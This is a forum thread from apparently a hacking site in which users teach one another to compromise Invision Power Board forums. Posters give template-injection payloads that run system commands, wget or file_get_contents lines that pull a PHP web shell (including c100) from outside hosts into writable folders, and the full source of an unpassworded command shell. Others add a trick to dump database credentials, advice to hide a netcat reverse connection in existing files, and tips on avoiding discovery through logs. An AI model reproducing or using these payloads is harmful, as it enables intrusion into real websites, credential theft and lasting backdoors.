|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
|
|
Posted: Wed Oct 28, 2009 1:22 am |
|
|
RG007145 |
Active user |
|
|
Joined: May 04, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
What PHP code are you executing?
I know this is a bit of spoonfeeding, but I don't think there's any other way to show you:
So the first thing you do is figure out if running system commands is even possible - execute the following code:
Code: | ${${print $query='ls -al'}}
${${system($query,$out)}}
${${print $out}} |
The roundabout way is so that it works in older versions of PHP, which usually screws up if you put quotes in the system command. If the above command does not list files, try passthru() and execute() instead of system().
If it still doesn't work, system commands are unfortunately disabled. You may be able to write PHP to read a server file though.
Anyway, let's assume that system() commands are enabled. You will get a list of files in the standard unix format along with permissions.
If there is any folder with "rwxrwxrwx", you can write to it. So put, say, a PHP shell somewhere on your own domain. You can either make it a .txt and use PHP include(), or you can upload it to the writeable folder you found if you use wget.
For example, let's say the folder cache is writeable, and your php file ends in a ".php" (if you want your file to not be parsed by your own server, put the <?php and ?> tags in echo so that the resulting file is in itself a php - I've put my most basic shell at the end of this for you). Let's also say your file is on the domain http://xyz.org/meep.php
You would run the following command:
Code: | ${${print $query='cd cache; wget http://xyz.org/meep.php'}}
${${system($query,$out)}}
${${print $out}} |
This will upload the shell to the cache folder. You can access it at http://target/forum/cache/meep.php.
From there you can use the "ls" and "cd" commands to traverse directories and the "cat" command to read files. You can even tar a phpmyadmin and wget and then untar it. You can also upload, say, a .cpp file, compile it with g++ and run it. This could be a privilige escalation attempt. I'm guessing those are all advanced topics you'll get around to in due time.
The Promised Shell (unpassworded! You may put a GET variable check so that it checks like meep.php?password=1 where password is your own password, but that may not be for beginners)
------------------------------------------------------------------------------------
Code: | <textarea rows="10" cols="100">
<?php echo "<?php " ?>
if(isset($_POST['command'])){
system($_POST['command']);
}
<?php echo " ?>" ?>
</textarea>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="POST">
<input type="text" name="command" value="" size="40" maxlength="255">
</form>
<?php echo "<?php " ?>
print $_POST['command'];
<?php echo "?>" ?> |
|
|
|
|
|
|
|
|
|
Posted: Wed Oct 28, 2009 8:36 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
RG007145 nice write BUT, ......
system(),passthru(),exec() ....etc are system FUNCTIONS not commands and in new version of IPB all this functions is disabled.
Quote: | If there is any folder with "rwxrwxrwx" |
You mean dwxrwxrwx i suppose.
wget is great but you don't know wget are installed on the server or not.First of all you need to check which downloaders ar installed on server.Very easy
which wget curl fetch lynx links get
When.What if Allow_url_fopen is OFF?You need to check and this. phpinfo();
Quote: | You may put a GET variable check so that it checks like meep.php?password=1 where password is your own password, but that may not be for beginners) |
If you do this every lamer with brains will find your password for 5 min.Why?Very simple.access_log,stats ....etc and worse he find your shell. |
|
|
|
|
|
|
|
|
Posted: Wed Oct 28, 2009 3:13 pm |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Wed Oct 28, 2009 4:00 pm |
|
|
RG007145 |
Active user |
|
|
Joined: May 04, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
Quote: |
If you do this every lamer with brains will find your password for 5 min.Why?Very simple.access_log,stats ....etc and worse he find your shell. |
They will find your shell anyway. The best thing to do is put a netcat call in an existing php file, listen on a port and reverse connect by visiting the file.
PHP shells are never going to just stay there forever. Unless you're attacking someone really dumb.
And yes, I meant "drwxrwxrwx". There is no such thing as "dwxrwxrwx"? Maybe there is, I dunno. |
|
|
|
|
|
|
|
|
Posted: Wed Oct 28, 2009 5:26 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Install IPB on your PC.
Logon as root admin.
Go to Tool&Settings.
From left menu "View all settings" or something like this.
choose some setting from list.
"Add new setting"
Scroll down and you see box "Raw bla bla php code"
type system('ls -la');
..and push save .... and you see Warning: system(),passthru().... etc is disabled.
In whis box you be able to execute php code.
Try phpinfo(); and push save and you see phpinfo.
Don't forget to delete every new setting.
Quote: | They will find your shell anyway |
I don't agree with you.For netcat too. |
|
|
|
|
|
|
|
|
Posted: Sun Jan 03, 2010 7:42 pm |
|
|
AIR_Nayden |
Advanced user |
|
|
Joined: Dec 30, 2009 |
Posts: 70 |
Location: Bulgaria |
|
|
|
|
|
|
What to do if the wget function doesn't work? Here's the answer: go to the section for editing language and open lang_calendar for example.
Pick up a row and add the following code
Code: |
{${$f=fopen(ROOT_PATH.'uploads/shell_c100.php', 'w')}}
{${$s=file_get_contents('http://blacknite.eu/php_shells/c100.txt')}}
{${fwrite($f, $s)}}
{${fclose(ROOT_PATH.'uploads/shell_c100.php')}}
|
save the file and go to http://forum/index.php?act=calendar
That will execute the code. Now your shell is located in uploads dir under the name of shell_c100.php
Enjoy
PS: ROOT_PATH is a constant defined in the source code of IPB
IF you can't upload a shell for some reason you can still get the information about SQL user/pass/db and many other located in conf_global.php or defined in ipsclass.php for the current session and etc. Just go to language edit->lang_calendar and place the following code in random row
Code: |
{${print_r($this->vars)}}
|
After that go to http://forum/index.php?act=calendar and see the result |
|
Last edited by AIR_Nayden on Thu Jan 14, 2010 8:28 am; edited 1 time in total |
|
|
|
|
|
|
|
Posted: Tue Jan 05, 2010 7:15 pm |
|
|
AIR_Nayden |
Advanced user |
|
|
Joined: Dec 30, 2009 |
Posts: 70 |
Location: Bulgaria |
|
|
|
|
|
|
I run in a nastu problem.... I have no permission to get the file contents in any way... tried with file_get_contents, fopen, fread.... wget... (the shell is on remote host with .txt extension)
The other problem: no permissions to write in the specified directory... The chmod command is also not permitted... The eval() function with base64_decode with the encrypted source of the shell didn't work too...
If u have some ideas what to do - share them |
|
|
|
|
Posted: Tue Jan 05, 2010 8:20 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
$_SERVER()
$_REQUEST()
Good luck. |
|
|
|
|
Posted: Tue Jan 05, 2010 8:34 pm |
|
|
AIR_Nayden |
Advanced user |
|
|
Joined: Dec 30, 2009 |
Posts: 70 |
Location: Bulgaria |
|
|
|
|
|
|
can u give a simple example, because I've never worked with these two.... |
|
|
|
|
Posted: Wed Jan 06, 2010 6:19 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
Posted: Wed Jan 06, 2010 12:17 pm |
|
|
AIR_Nayden |
Advanced user |
|
|
Joined: Dec 30, 2009 |
Posts: 70 |
Location: Bulgaria |
|
|
|
|
|
|
I know that but don't now how to use it in this situation when no writing in directories is allowed.... |
|
|
|
|
Posted: Wed Jan 06, 2010 2:40 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
You have shell in admin cp.Search other vhosts on server and then upload shell.
@copy('http://blablq.com/shell.php','/usr/home/dir/public_html/'); |
|
|
|
|
|
thank you AIR_Nayden i got it now |
|
Posted: Thu Jan 14, 2010 6:27 am |
|
|
wer0ckz |
Active user |
|
|
Joined: Jan 11, 2010 |
Posts: 25 |
Location: Philippines |
|
|
|
|
|
|
thank you AIR_Nayden i got it now / im now able to upload shells hahaha thank you so much |
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 3 of 3
Goto page Previous1, 2, 3
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|